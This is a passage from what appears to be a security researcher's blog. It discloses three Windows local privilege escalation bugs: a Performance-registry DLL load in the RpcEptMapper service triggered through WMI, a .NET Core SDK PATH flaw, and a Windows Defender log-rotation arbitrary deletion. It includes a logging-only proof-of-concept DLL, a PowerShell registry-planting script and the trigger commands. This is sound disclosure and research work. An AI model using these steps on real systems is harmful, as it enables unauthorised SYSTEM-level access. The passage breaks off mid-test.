Still, I did take a quick look at each paragraph. And, I quickly spotted the keywords “Performance” and “DLL”. Under the subtitle “Perfomance”, we can read the following:

Performance: A key that specifies information for optional performance monitoring. The values under this key specify the name of the driver’s performance DLL and the names of certain exported functions in that DLL. You can add value entries to this subkey using AddReg entries in the driver’s INF file.

According to this short paragraph, one can theoretically register a DLL in a driver service in order to monitor its performances thanks to the Performance subkey. OK, this is really interesting! This key doesn’t exist by default for the RpcEptMapper service so it looks like it is exactly what we need. There is a slight problem though, this service is definitely not a driver service. Anyway, it’s still worth the try, but we need more information about this “Perfomance Monitoring” feature first.

Note: in Windows, each service has a given Type. A service type can be one of the following values: SERVICE_KERNEL_DRIVER (1), SERVICE_FILE_SYSTEM_DRIVER (2), SERVICE_ADAPTER (4), SERVICE_RECOGNIZER_DRIVER (8), SERVICE_WIN32_OWN_PROCESS (16), SERVICE_WIN32_SHARE_PROCESS (32) or SERVICE_INTERACTIVE_PROCESS (256).

After some googling, I found this resource in the documentation: Creating the Application’s Performance Key.

First, there is a nice tree structure that lists all the keys and values we have to create. Then, the description gives the following key information:

  • The Library value can contain a DLL name or a full path to a DLL.
  • The Open, Collect, and Close values allow you to specify the names of the functions that should be exported by the DLL.
  • The data type of these values is REG_SZ (or even REG_EXPAND_SZ for the Library value).

If you follow the links that are included in this resource, you’ll even find the prototype of these functions along with some code samples: Implementing OpenPerformanceData.

DWORD APIENTRY OpenPerfData(LPWSTR pContext);
DWORD APIENTRY CollectPerfData(LPWSTR pQuery, PVOID* ppData, LPDWORD pcbData, LPDWORD pObjectsReturned);
DWORD APIENTRY ClosePerfData();

I think that’s enough with the theory, it’s time to start writing some code!

Writing a Proof-of-Concept

Thanks to all the bits and pieces I was able to collect throughout the documentation, writing a simple Proof-of-Concept DLL should be pretty straightforward. But still, we need a plan!

When I need to exploit some sort of DLL hijacking vulnerability, I usually start with a simple and custom log helper function. The purpose of this function is to write some key information to a file whenever it’s invoked. Typically, I log the PID of the current process and the parent process, the name of the user that runs the process and the corresponding command line. I also log the name of the function that triggered this log event. This way, I know which part of the code was executed.

In my other articles, I always skipped the development part because I assumed that it was more or less obvious. But, I also want my blog posts to be beginner-friendly, so there is a contradiction. I will remedy this situation here by detailing the process. So, let’s fire up Visual Studio and create a new “C++ Console App” project. Note that I could have created a “Dynamic-Link Library (DLL)” project but I find it actually easier to just start with a console app.

Here is the initial code generated by Visual Studio:

#include <iostream>

int main()
{
    std::cout << "Hello World!\n";
}

Of course, that’s not what we want. We want to create a DLL, not an EXE, so we have to replace the main function with DllMain. You can find a skeleton code for this function in the documentation: Initialize a DLL.

#include <Windows.h>

extern "C" BOOL WINAPI DllMain(HINSTANCE const instance, DWORD const reason, LPVOID const reserved)
{
    switch (reason)
    {
    case DLL_PROCESS_ATTACH:
        Log(L"DllMain"); // See log helper function below
        break;
    case DLL_THREAD_ATTACH:
        break;
    case DLL_THREAD_DETACH:
        break;
    case DLL_PROCESS_DETACH:
        break;
    }
    return TRUE;
}

In parallel, we also need to change the settings of the project to specify that the output compiled file should be a DLL rather than an EXE. To do so, you can open the project properties and, in the “General” section, select “Dynamic Library (.dll)” as the “Configuration Type”. Right under the title bar, you can also select “All Configurations” and “All Platforms” so that this setting can be applied globally.

Next, I add my custom log helper function.

#include <Lmcons.h> // UNLEN + GetUserName
#include <tlhelp32.h> // CreateToolhelp32Snapshot()
#include <strsafe.h>

void Log(LPCWSTR pwszCallingFrom)
{
    LPWSTR pwszBuffer, pwszCommandLine;
    WCHAR wszUsername[UNLEN + 1] = { 0 };
    SYSTEMTIME st = { 0 };
    HANDLE hToolhelpSnapshot;
    PROCESSENTRY32 stProcessEntry = { 0 };
    DWORD dwPcbBuffer = UNLEN, dwBytesWritten = 0, dwProcessId = 0, dwParentProcessId = 0, dwBufSize = 0;
    BOOL bResult = FALSE;

    // Get the command line of the current process
    pwszCommandLine = GetCommandLine();

    // Get the name of the process owner
    GetUserName(wszUsername, &dwPcbBuffer);

    // Get the PID of the current process
    dwProcessId = GetCurrentProcessId();

    // Get the PID of the parent process
    hToolhelpSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
    stProcessEntry.dwSize = sizeof(PROCESSENTRY32);
    if (Process32First(hToolhelpSnapshot, &stProcessEntry)) {
        do {
            if (stProcessEntry.th32ProcessID == dwProcessId) {
                dwParentProcessId = stProcessEntry.th32ParentProcessID;
                break;
            }
        } while (Process32Next(hToolhelpSnapshot, &stProcessEntry));
    }
    CloseHandle(hToolhelpSnapshot);

    // Get the current date and time
    GetLocalTime(&st);

    // Prepare the output string and log the result
    dwBufSize = 4096 * sizeof(WCHAR);
    pwszBuffer = (LPWSTR)malloc(dwBufSize);
    if (pwszBuffer)
    {
        StringCchPrintf(pwszBuffer, dwBufSize, L"[%.2u:%.2u:%.2u] - PID=%d - PPID=%d - USER='%s' - CMD='%s' - METHOD='%s'\r\n",
            st.wHour,
            st.wMinute,
            st.wSecond,
            dwProcessId,
            dwParentProcessId,
            wszUsername,
            pwszCommandLine,
            pwszCallingFrom
        );

        LogToFile(L"C:\\LOGS\\RpcEptMapperPoc.log", pwszBuffer);

        free(pwszBuffer);
    }
}

Then, we can populate the DLL with the three functions we saw in the documentation. The documentation also states that they should return ERROR_SUCCESS if successful.

DWORD APIENTRY OpenPerfData(LPWSTR pContext)
{
    Log(L"OpenPerfData");
    return ERROR_SUCCESS;
}

DWORD APIENTRY CollectPerfData(LPWSTR pQuery, PVOID* ppData, LPDWORD pcbData, LPDWORD pObjectsReturned)
{
    Log(L"CollectPerfData");
    return ERROR_SUCCESS;
}

DWORD APIENTRY ClosePerfData()
{
    Log(L"ClosePerfData");
    return ERROR_SUCCESS;
}

Ok, so the project is now properly configured, DllMain is implemented, we have a log helper function and the three required functions. One last thing is missing though. If we compile this code, OpenPerfData, CollectPerfData and ClosePerfData will be available as internal functions only so we need to export them. This can be achieved in several ways. For example, you could create a DEF file and then configure the project appropriately. However, I prefer to use the __declspec(dllexport) keyword (doc), especially for a small project like this one. This way, we just have to declare the three functions at the beginning of the source code.

extern "C" __declspec(dllexport) DWORD APIENTRY OpenPerfData(LPWSTR pContext);
extern "C" __declspec(dllexport) DWORD APIENTRY CollectPerfData(LPWSTR pQuery, PVOID* ppData, LPDWORD pcbData, LPDWORD pObjectsReturned);
extern "C" __declspec(dllexport) DWORD APIENTRY ClosePerfData();

If you want to see the full code, I uploaded it here.

Finally, we can select Release/x64 and “Build the solution”. This will produce our DLL file: .\DllRpcEndpointMapperPoc\x64\Release\DllRpcEndpointMapperPoc.dll.

Testing the PoC

Before going any further, I always make sure that my payload is working properly by testing it separately. The little time spent here can save a lot of time afterwards by preventing you from going down a rabbit hole during a hypothetical debug phase. To do so, we can simply use rundll32.exe and pass the name of the DLL and the name of an exported function as the parameters.

C:\Users\lab-user\Downloads\>rundll32 DllRpcEndpointMapperPoc.dll,OpenPerfData

Great, the log file was created and, if we open it, we can see two entries. The first one was written when the DLL was loaded by rundll32.exe. The second one was written when OpenPerfData was called. Looks good! :slightly_smiling_face:

[21:25:34] - PID=3040 - PPID=2964 - USER='lab-user' - CMD='rundll32  DllRpcEndpointMapperPoc.dll,OpenPerfData' - METHOD='DllMain'
[21:25:34] - PID=3040 - PPID=2964 - USER='lab-user' - CMD='rundll32  DllRpcEndpointMapperPoc.dll,OpenPerfData' - METHOD='OpenPerfData'

Ok, now we can focus on the actual vulnerability and start by creating the required registry key and values. We can either do this manually using reg.exe / regedit.exe or programmatically with a script. Since I already went through the manual steps during my initial research, I’ll show a cleaner way to do the same thing with a PowerShell script. Besides, creating registry keys and values in PowerShell is as easy as calling New-Item and New-ItemProperty, isn’t it? :thinking:

Requested registry access is not allowed… Hmmm, ok… It looks like it won’t be that easy after all. :stuck_out_tongue:

I didn’t really investigate this issue but my guess is that when we call New-Item, powershell.exe actually tries to open the parent registry key with some flags that correspond to permissions we don’t have.

Anyway, if the built-in cmdlets don’t do the job, we can always go down one level and invoke DotNet functions directly. Indeed, registry keys can also be created with the following code in PowerShell.

[Microsoft.Win32.Registry]::LocalMachine.CreateSubKey("SYSTEM\CurrentControlSet\Services\RpcEptMapper\Performance")

Here we go! In the end, I put together the following script in order to create the appropriate key and values, wait for some user input and finally terminate by cleaning everything up.

$ServiceKey = "SYSTEM\CurrentControlSet\Services\RpcEptMapper\Performance"

Write-Host "[*] Create 'Performance' subkey"
[void] [Microsoft.Win32.Registry]::LocalMachine.CreateSubKey($ServiceKey)
Write-Host "[*] Create 'Library' value"
New-ItemProperty -Path "HKLM:$($ServiceKey)" -Name "Library" -Value "$($pwd)\DllRpcEndpointMapperPoc.dll" -PropertyType "String" -Force | Out-Null
Write-Host "[*] Create 'Open' value"
New-ItemProperty -Path "HKLM:$($ServiceKey)" -Name "Open" -Value "OpenPerfData" -PropertyType "String" -Force | Out-Null
Write-Host "[*] Create 'Collect' value"
New-ItemProperty -Path "HKLM:$($ServiceKey)" -Name "Collect" -Value "CollectPerfData" -PropertyType "String" -Force | Out-Null
Write-Host "[*] Create 'Close' value"
New-ItemProperty -Path "HKLM:$($ServiceKey)" -Name "Close" -Value "ClosePerfData" -PropertyType "String" -Force | Out-Null

Read-Host -Prompt "Press any key to continue"

Write-Host "[*] Cleanup"
Remove-ItemProperty -Path "HKLM:$($ServiceKey)" -Name "Library" -Force
Remove-ItemProperty -Path "HKLM:$($ServiceKey)" -Name "Open" -Force
Remove-ItemProperty -Path "HKLM:$($ServiceKey)" -Name "Collect" -Force
Remove-ItemProperty -Path "HKLM:$($ServiceKey)" -Name "Close" -Force
[Microsoft.Win32.Registry]::LocalMachine.DeleteSubKey($ServiceKey)

The last step now, how do we trick the RPC Endpoint Mapper service into loading our Performace DLL? Unfortunately, I haven’t kept track of all the different things I tried. It would have been really interesting in the context of this blog post to highlight how tedious and time consuming research can sometimes be. Anyway, one thing I found along the way is that you can query Perfomance Counters using WMI (Windows Management Instrumentation), which isn’t too surprising after all. More info here: WMI Performance Counter Types.

Counter types appear as the CounterType qualifier for properties in Win32_PerfRawData classes, and as the CookingType qualifier for properties in Win32_PerfFormattedData classes.

So, I first enumerated the WMI classes that are related to Performace Data in PowerShell using the following command.

Get-WmiObject -List | Where-Object { $_.Name -Like "Win32_Perf*" }

And, I saw that my log file was created almost right away! Here is the content of the file.

[21:17:49] - PID=4904 - PPID=664 - USER='SYSTEM' - CMD='C:\Windows\system32\wbem\wmiprvse.exe' - METHOD='DllMain'
[21:17:49] - PID=4904 - PPID=664 - USER='SYSTEM' - CMD='C:\Windows\system32\wbem\wmiprvse.exe' - METHOD='OpenPerfData'
[21:17:49] - PID=4904 - PPID=664 - USER='SYSTEM' - CMD='C:\Windows\system32\wbem\wmiprvse.exe' - METHOD='CollectPerfData'
[21:17:49] - PID=4904 - PPID=664 - USER='SYSTEM' - CMD='C:\Windows\system32\wbem\wmiprvse.exe' - METHOD='CollectPerfData'
[21:17:49] - PID=4904 - PPID=664 - USER='SYSTEM' - CMD='C:\Windows\system32\wbem\wmiprvse.exe' - METHOD='CollectPerfData'
[21:17:49] - PID=4904 - PPID=664 - USER='SYSTEM' - CMD='C:\Windows\system32\wbem\wmiprvse.exe' - METHOD='CollectPerfData'
[21:17:49] - PID=4904 - PPID=664 - USER='SYSTEM' - CMD='C:\Windows\system32\wbem\wmiprvse.exe' - METHOD='CollectPerfData'
[21:17:49] - PID=4904 - PPID=664 - USER='SYSTEM' - CMD='C:\Windows\system32\wbem\wmiprvse.exe' - METHOD='CollectPerfData'
[21:17:49] - PID=4904 - PPID=664 - USER='SYSTEM' - CMD='C:\Windows\system32\wbem\wmiprvse.exe' - METHOD='CollectPerfData'
[21:17:49] - PID=4904 - PPID=664 - USER='SYSTEM' - CMD='C:\Windows\system32\wbem\wmiprvse.exe' - METHOD='CollectPerfData'
[21:17:49] - PID=4904 - PPID=664 - USER='SYSTEM' - CMD='C:\Windows\system32\wbem\wmiprvse.exe' - METHOD='CollectPerfData'
[21:17:49] - PID=4904 - PPID=664 - USER='SYSTEM' - CMD='C:\Windows\system32\wbem\wmiprvse.exe' - METHOD='CollectPerfData'
[21:17:49] - PID=4904 - PPID=664 - USER='SYSTEM' - CMD='C:\Windows\system32\wbem\wmiprvse.exe' - METHOD='CollectPerfData'

I expected to get arbitary code execution as NETWORK SERVICE in the context of the RpcEptMapper service at most but, it looks like I got a much better result than anticipated. I actually got arbitrary code execution in the context of the WMI service itself, which runs as LOCAL SYSTEM. How amazing is that?! :sunglasses:

Note: if I had got arbirary code execution as NETWORK SERVICE, I would have been just a token away from the LOCAL SYSTEM account thanks to the trick that was demonstrated by James Forshaw a few months ago in this blog post: Sharing a Logon Session a Little Too Much.

I also tried to get each WMI class separately and I observed the exact same result.

Get-WmiObject Win32_Perf
Get-WmiObject Win32_PerfRawData
Get-WmiObject Win32_PerfFormattedData

Conclusion

I don’t know how this vulnerability has gone unnoticed for so long. One explanation is that other tools probably looked for full write access in the registry, whereas AppendData/AddSubdirectory was actually enough in this case. Regarding the “misconfiguration” itself, I would assume that the registry key was set this way for a specific purpose, although I can’t think of a concrete scenario in which users would have any kind of permissions to modify a service’s configuration.

I decided to write about this vulnerability publicly for two reasons. The first one is that I actually made it public - without initially realizing it - the day I updated my PrivescCheck script with the GetModfiableRegistryPath function, which was several months ago. The second one is that the impact is low. It requires local access and affects only old versions of Windows that are no longer supported (unless you have purchased the Extended Support…). At this point, if you are still using Windows 7 / Server 2008 R2 without isolating these machines properly in the network first, then preventing an attacker from getting SYSTEM privileges is probably the least of your worries.

Apart from the anecdotal side of this privilege escalation vulnerability, I think that this “Perfomance” registry setting opens up really interesting opportunities for post exploitation, lateral movement and AV/EDR evasion. I already have a few particular scenarios in mind but I haven’t tested any of them yet. To be continued?…

Links & Resources

Windows .Net Core SDK Elevation of Privilege

There was a weird bug in the DotNet Core Toolset installer that allowed any local user to elevate their privileges to SYSTEM. In this blog post, I want to share the details of this bug that was silently (but only partially) fixed despite not being acknowledged as a vulnerability by Microsoft.

Introduction

In March 2020, jonaslyk told me about a weird bug he encountered on his personal computer. The SYSTEM’s PATH environment variable was populated with a path that was seemingly related to DotNet. The weird thing was that this path pointed to a non-admin user folder. So, I checked on my own machine but, although there was a DotNet-related path, it pointed to a local admin folder. Anyway, if the path of a user-owned folder can be appended to this environment variable, that means code execution as SYSTEM. So, we decided to work together on this strange case and see what we could come up with.

The Initial Setup

We started with a clean and fully updated installation of Windows 10. In this initial state, here is the default value of the SYSTEM account’s PATH environment variable. As a reminder S-1-5-18 is the Security Identifier (SID) of the LocalSystem account.

reg query "HKU\S-1-5-18\Environment" /v Path

Then we installed Visual Studio Community 2019 (link). Once installed, we selected the .Net desktop development component in the Installer.

After clicking the “Install” button, the packages are downloaded and installed.

We are looking for a registry key modification so we can use Process Monitor to easily monitor what’s going on in the background.

Things get interesting when the “.Net Core toolset” is installed. We can see a RegSetValue operation originating from an executable called dotnet.exe on HKU\.DEFAULT\Environment\PATH. After this event, we can see that the PATH value in HKU\S-1-5-18\Environment is indeed different.

We may notice two potential issues here:

  1. The variable %USERPROFILE% is resolved to the current user’s home folder instead of the SYSTEM account’s home folder.
  2. Another path, pointing to a user-owned folder once again, is appended to the the SYSTEM account’s PATH.

In these two cases, the current user is a local administrator so the consequences of such modifications are somewhat limited. Though, they shouldn’t occur because they may have unintended side effects (e.g.: UAC bypass).

After reading this, you might have a feeling of déja vu. If so, it means that you probably stumbled upon this post by @RedVuln at some point: .Net System Persistence / bypassuac / Privesc. It looks like he found this bug almost at the same time Jonas and I were working on it. But there is a problem, all of this can be achieved only as an administrator because the installation of the DotNet SDK requires such privileges. Or does it?

The Actual Privilege Escalation Vulnerability

In the previous part, we saw that the installation process of the .Net SDK had some potentially unintended consequences on the Path Environment variable of the SYSTEM account. Though, strictly speaking, this doesn’t lead to an Elevation of Privilege.

But, what if I told you that the exact same behavior could be reproduced while being logged in as a normal user with no admin rights?

When Visual Studio is installed, several MSI files seem to be copied to the C:\Windows\Installer folder. Since we observed that the RegSetValue operation originated from an executable called dotnet.exe, we can try to search for this string in these files. Here is what we get using the findstr command.

cd "C:\Windows\Installer"
findstr /I /M "dotnet.exe" "*.msi"

Great! We have two matches. What we can do next is try to run each of these files as a normal user with the command msiexec /qn /a <FILE> and observe the result on the SYSTEM account’s Environment Path variable in the registry.

Running the first MSI file, we don’t see anything. However, running the second MSI file, we observe the exact same operation which initially occurred when we installed the DotNet SDK as an administrator.

This time though, because the MSI file was run by the user lab-user, the path C:\Users\lab-user\.dotnet\tools is appended to the SYSTEM account’s PATH environment variable. As a result, this user can now get code execution as SYSTEM by planting a DLL and waiting for a service to load it. This can be achieved - on Windows 10 - by hijacking the WptsExtensions.dll DLL which is loaded by the Task Scheduler service upon startup, as described by @RedVuln in his post.

Root Cause Analysis

The exploitation of this bug is trivial so I will focus on the root cause analysis instead, which turned out to be quite interesting for me.

The question is: where do we start? Well, let’s start at the beginning… :slightly_smiling_face:

We have a Process Monitor dump file that contains the RegSetValue event we are interested in. That’s a good starting point. Let’s see what we can learn from the Stack Trace.

We can see that the dotnet.exe executable loads several DLLs and then loads several .Net assemblies.

Looking at the details of the Process Start operation, we can see the following command line:

"C:\Program Files\dotnet\\dotnet.exe" exec "C:\Program Files\dotnet\\sdk\3.1.200\dotnet.dll" internal-reportinstallsuccess ""

From this command line, we may assume that the Win32 dotnet.exe executable is actually a wrapper for the dotnet.dll assembly, which is loaded with the following arguments: internalreportinstallsuccess "".

Therefore, reversing this assembly should provide us with all the answers we are looking for:

  1. How does the executable evaluate the .Net Core tools path?
  2. How does the executable add the path to the SYSTEM account’s PATH in the registry?

To inspect this assembly, I used dnSpy. It’s definitely the best tool I’ve used so far for this kind of task.

The Program’s Main starts by calling Program.ProcessArgs().

Several things happen in this function but the most important part is framed in red on the below screenshot.

Indeed, the function with the name ConfigureDotNetForFirstTimeUse() looks like a good candidate to continue the investigation.

This assumption is confirmed when looking at the content of the function because we are starting to see some references to the “Environment Path”.

The method CreateEnvironmentPath() creates an instance of an object implementing the IEnvironmentProvider interface, depending on the underlying Operating System. Thus, it would be a new WindowsEnvironmentPath object here.

The object is instantiated based on a dynamically generated path, which is formed by the concatenation of some string and "tools".

This DotnetUserProfileFolderPath string itself is the concatenation of some other string and ".dotnet".

The DotnetHomePath string is generated based on the value of an Environment variable.

The name of the variable depends on PlateformHomeVariableName, which would be "USERPROFILE" here because the OS is Windows.

To conclude this first part of the analysis, we know that the DotNet tools’ path follows the following scheme: <ENV.USERPROFILE>\.dotnet\tools, where the value of ENV.USERPROFILE is returned by Environment.GetEnvironmentVariable(). So far, that’s consistent with what we observed with Process Monitor so we must be on the right track.

If we check the documentation of Environment.GetEnvironmentVariable(), we can read that, by default, the value is retrieved from the current process if an EnvironmentVariableTarget isn’t specified.

Now, if we take another look at the details of the Process Start operation in Process Monitor, we can see that the process uses the current user’s environment, although it’s running as NT AUTHORITY\SYSTEM. Therefore, the final tools path is resolved to C:\Users\lab-user\.dotnet\tools.

We now know how the path is determined so we have the answer to our first question. We now need to find out how this path is handled afterwards.

To answer the second question, we may go back to the Program.ConfigureDotNetForFirstTimeUse() method and see what’s executed after the CreateEnvironmentPath() function call.

Once the tools path has been determined, a new DotnetFirstTimeUseConfigurer object is created and the Configure() method is immediately called. At this point, the path information is stored in the EnvironmentPath object identified by the pathAdder variable.

In this method, the most relevant piece of code is framed in red on the below screenshot, where the AddPackageExecutablePath() method is invoked.

This method is very simple. The AddPackageExecutablePathToUserPath() method is called on the EnviromentPath object.

The content of the AddPackageExecutablePathToUserPath() method finally gives us the answer to our second question.

First, this method retrieves the value of the PATH environment variable but, this time, it uses a slightly different way to do so. It invokes GetEnvironmentVariable with an additional EnvironmentVariableTarget parameter, which is set to 1.

From the documentation, we can read that if this parameter is set to 1, the value is retrieved from the HKEY_CURRENT_USER\Environment registry key. The current user being NT AUTHORITY\SYSTEM here, the value is retrieved from HKU\S-1-5-18\Environment.

The problem is that this applies to the SetEnvironmentVariable() method as well. Therefore, C:\Users\lab-user\.dotnet\tools\ is appended to the Path Environment variable of the LOCAL SYSTEM account in the registry.

As a conclusion, the .Net Core toolset path is created based on the current user’s environment but is applied to the LOCAL SYSTEM account in the registry because the process is running as NT AUTHORITY\SYSTEM, hence the vulnerability.

Conclusion

The status of this vulnerability is quite unclear. Since it wasn’t officially acknowledged by Microsoft, there is no CVE ID associated to this finding. Though, as mentioned in the introduction, it has partially been fixed. Namely, the C:\Users\<USER>\.dotnet\tools path is no longer appended to the Path if you use one of the latest .NET Core installers.

Now, what can you do to make sure your machine isn’t affected by this vulnerability?

First, check the following value in the registry.

C:\Windows\System32>reg query HKU\S-1-5-18\Environment /v Path

HKEY_USERS\S-1-5-18\Environment
    Path    REG_EXPAND_SZ    %USERPROFILE%\AppData\Local\Microsoft\WindowsApps;

If you see something that is different from what is shown above, you may restore the default value using the following command as an administrator:

C:\Windows\System32>reg ADD HKU\S-1-5-18\Environment /v Path /d "%USERPROFILE%\AppData\Local\Microsoft\WindowsApps;" /F
The operation completed successfully.

Then, you can update Visual Studio or the .Net SDK and check the registry once again. The “tools” folder should no longer be present.

Unfortunately, according to my latest tests, the %USERPROFILE% variable still gets resolved to the current user’s “home” folder. This means that the Path is still altered when installing the .Net SDK. Thankfully, this one cannot be exploited for local privilege escalation because the corresponding folder is owned by an administrator.

Links & Resources

CVE-2020-1170 - Microsoft Windows Defender Elevation of Privilege Vulnerability

Here is my writeup about CVE-2020-1170, an elevation of privilege bug in Windows Defender. Finding a vulnerability in a security-oriented product is quite satisfying. Though, there was nothing groundbreaking. It’s quite the opposite actually and I’m surprised nobody else reported it before me.

Introduction

Before diving into the technical details of this vulnerability, I want to say a quick word about the timeline. I initially reported this vulnerability through the Zero Day Initiative (ZDI) program around 8 months ago. After sending them my report, I received a reply stating that they weren’t interested in purchasing this vulnerability. At the time, I had only a few weeks of experience in Windows security research so I kind of relied on their judgement and left this finding aside. I even completely forgot about it in the following months.

Five months later, in late March 2020, I eventually went through my notes again and saw this report but, this time, my mindset was different. I had gained some experience because of a few other reports that I had sent to Microsoft directly. So, I knew that it was potentially eligible and I decided to spend a bit more time on it. It was a good decision because I even found a better way of triggering the vulnerability. I reported it to Microsoft in early April and it was acknowledged a few weeks later.

The Initial Thought Process

In the advisory published by Microsoft, you can read:

An elevation of privilege vulnerability exists in Windows Defender that leads to arbitrary file deletion on the system.

As usual, the description is quite generic. You’ll see that there is more to it than just an “arbitrary file deletion”.

The issue I found is related to the way Windows Defender log files are handled. In case you don’t know, Windows Defender uses 2 log files - MpCmdRun.log and MpSigStub.log - which are both located in C:\Windows\Temp. This directory is the default temp folder of the SYSTEM account but that’s also a folder where every user has Write access.

Althouth that may sound bad, it isn’t that bad because the permissions of the files are properly set (obviously?). By default, Administrators and SYSTEM have Full Control over these files, whereas normal users can’t even read them.

Here is an extract from a sample log file. As you can see, it is used to log events such as Signature Updates, but you can also find some entries related to Antivirus scans.

Signatures updates are automatically done on a regular basis but they can also be triggered manually using the Update-MpSignature PowerShell command for example, which doesn’t require any particular privileges. Therefore, these updates can be triggered as a normal user, as shown on the screenshot below.

During the process, we can see that some information is being written to C:\Windows\Temp\MpCmdRun.log by Windows Defender (as NT AUTHORITY\SYSTEM).

What this means is that, as a low-privileged user, we can trigger a log file write operation by a process running as NT AUTHORITY\SYSTEM. Though we don’t have access to the file and we can’t control its content. We don’t even have Write access on the Temp folder itself so we wouldn’t be able to set it as a mount point either. I can’t think of a more useless attack vector right now. :laughing:

Though, following my experience with CVE-2020-0668 (again…) - A Trivial Privilege Escalation Bug in Windows Service Tracing - I knew that there was potentially more to it than just a log file write.

Think about it for a second, each time a Signature Update is done (which happens quite often), a new entry is added to the file, which represents around 1 KB. That’s not much, right? But how much would it represent after several months or even years? In such case, log rotation mechanisms are often implemented so that old logs are compressed, archived or simply deleted. So, I wondered if such mechanism was also implemented to handle the MpCmdRun.log file. If so, there is probably some place for a privileged file operation abuse…

Searching for a Log Rotation Mechanism

In order to find a potential log rotation mechanism, I began by reversing the MpCmdRun.exe executable itself. After opening the file in IDA, the very first thing I did was search for occurrences of the MpCmdRun string. My initial objective was to see how the log file was handled. Looking at the Strings window is usually a good way to start.

Not surprisingly, the first result was MpCmdRun.log. Though, another very interesting result came out of this search: MpCmdRun_MaxLogSize. I was looking for a log rotation mechanism and this string was clearly the equivalent of “Follow the white rabbit”. Obviously, I took the red pill and went down the rabbit hole. :sunglasses:

Looking at the Xrefs of MpCmdRun_MaxLogSize , I found that it was used in only one function: MpCommonConfigGetValue().

The MpCommonConfigGetValue() function itself is called from MpCommonConfigLookupDword().

Finally, MpCommonConfigLookupDword() is called from the CLogHandle::Flush() method.

The following part of CLogHandle::Flush() is particularly interesting because it’s responsible for writing to the log file.

First, we can see that GetFileSizeEx() is called on hObject (1), which is a handle pointing to the log file (MpCmdRun.log) at this point. The result of this function is returned in FileSize, which is a LARGE_INTEGER structure.

typedef union _LARGE_INTEGER {
  struct {
    DWORD LowPart;
    LONG  HighPart;
  } DUMMYSTRUCTNAME;
  struct {
    DWORD LowPart;
    LONG  HighPart;
  } u;
  LONGLONG QuadPart;
} LARGE_INTEGER;

Since MpCmdRun.exe is a 64-bit executable here, QuadPart is used to get the file size as a LONGLONG directly. This value is stored in v11 and is then compared against the value returned by MpCommonConfigLookupDword() (2). If the file size is greater than this value, the PurgeLog() function is called.

So, before going any further, we need to get the value returned by MpCommonConfigLookupDword(). To do so, the easiest way I found was to put a breakpoint right after this function call and get the result from the RAX register.

Here is what it looks like once the breakpoint is hit:

Therefore, we now know that the maximum file size is 0x1000000, i.e. 16,777,216 bytes (16MB).

The next logical question would then be: what happens when the log file size exceeds this value? As we saw earlier, when the size of the log file exceeds 16MB, the PurgeLog() function is called. Based on the name, we may assume that we will probably find the answer to this second question inside this function.

When this function is called, a new filename is first prepared by concatenating the original filename and .bak. Then, the original file is moved, which means that MpCmdRun.log is renamed as MpCmdRun.log.bak. Now we have our answer: a log rotation mechanism is indeed implemented.

Here, I could have continued the reverse engineering process but I had something else in mind. Considering that knowledge, I wanted to adopt a simpler approach. The idea was to check the behavior of this mechanism under various conditions and observe the result using Procmon.

The Vulnerability

Here is what we know and what we have learnt so far:

  • Windows Defender writes some log events to C:\Windows\Temp\MpCmdRun.log (e.g.: Signature Updates).
  • Any user can create files and directories in C:\Windows\Temp\.
  • A log rotation mechanism prevents the log file from exceeding 16MB by moving it to C:\Windows\Temp\MpCmdRun.log.bak and creating a new one.

Do you see where I’m going here? Can you spot the potential issue? What would happen if there was already something named MpCmdRun.log.bak in C:\Windows\Temp\? :thinking:

To answer this question, I considered the following test protocol:

  1. Create something called MpCmdRun.log.bak in C:\Windows\Temp\.
  2. Fill C:\Windows\Temp\MpCmdRun.log with arbitrary data so that its size is close to 16MB.
  3. Trigger a Signature Update
  4. Observe the result with Procmon

If MpCmdRun.log.bak is an existing file, it is simply overwritten. We may assume that it’s the intendend behavior so this test isn’t very conclusive. Rather, the very first test case scenario that came to my mind was: what if MpCmdRun.log.bak is a directory?

If MpCmdRun.log.bak isn’t a simple file, we may assume that it cannot be simply overwritten. So, my initial assumption was that the log rotation would simply fail. Instead of creating a backup of the original log file, it would just be overwritten. Though, the behavior I observed with Procmon was far more interesting than that. Defender actually deleted the directory and then proceeded with the normal log rotation. So, I decided to redo this test but, this time, I also created files and directories inside C:\Windows\Temp\MpCmdRun.log.bak\. It turns out that the deletetion was actually recursive!

That’s interesting! Now, the question is: can we redirect this file operation with a junction?

Here is the initial setup for this test case:

  • A dummy target directory is created: C:\ZZ_SANDBOX\target.
  • MpCmdRun.log.bak is created as a directory and is set as a mountpoint to this directory.
  • The MpCmdRun.log file is filled with 16,777,002 bytes of arbitrary data.

The target directory of the mountpoint contains a folder and a file.

And here is what I observed in Procmon after executing the Update-MpSignature PowerShell command:

Defender followed the mountpoint, deleted each files and folders recursively and finally deleted the folder C:\Windows\Temp\MpCmdRun.log.bak\ itself. Nice! This means that, as a normal user, we can trick this service into deleting any file or folder we want on the filesystem…

Exploitability

As we saw in the previous part, exploitation is quite straightforward. The only thing we would have to do is create the directory C:\Windows\Temp\MpCmdRun.log.bak\ and set it as a mountpoint to another location on the filesystem.

Note: actually it’s not that simple because an additional trick is required if we want to perform a targeted file or directory deletion but I won’t discuss this here.

We face one practical issue though: how much time would it require to fill the log file until its size exceeds 16MB, which is quite a high value for a simple log file. Therefore, I did several tests and measured the time required by each command. Then, I extrapolated the results in order to estimate the overall time it would take. It should be noted that the Update-MpSignature command cannot be run multiple times in parallel (which makes sense for an update process).

Test #1

As a first test, I chose a naive approach. I ran the Update-MpSignature command a hundred times and measured the overall time it would take.

Here is the result of this first test. With this technique, it would take more than 22 hours to fill the file and trigger the vulnerability if we ran the Update-MpSignature command in a loop.

DESCRIPTION TIME FILE SIZE # OF CALLS
Raw data for 100 calls 650s (10m 50s) 136,230 bytes 100
Estimated time to reach the target file size 80,050s (22h 14m 10s) 16,777,216 bytes 12,316

That’s not very practical, to say the least.

Test #2

After test #1, I checked the documentation of the Update-MpSignature command to see if it could be tweaked in order to speed up the entire process. This command has a very limited set of options but one of them caught my eye.

This command accepts an UpdateSource as a parameter, which is actually an enumeration as we can see on the previous screenshot. When using most of the available values, an error message is immediately returned and nothing is written to the log file so they would be useless for this exploit scenario.

Though, when using the InternalDefinitionUpdateServer value, I observed an interesting result.

Since my VM is a standalone installation of Windows, it isn’t configured to use an “internal server” for the updates. Instead, they are received directly from MS servers, hence the error message.

The main benefit of this method is that the error message is returned almost instantly but the event is still written to the log file, which makes it a very good candidate for the exploit in this particular scenario.

Therefore, I ran this command a hundred times as well and observed the result.

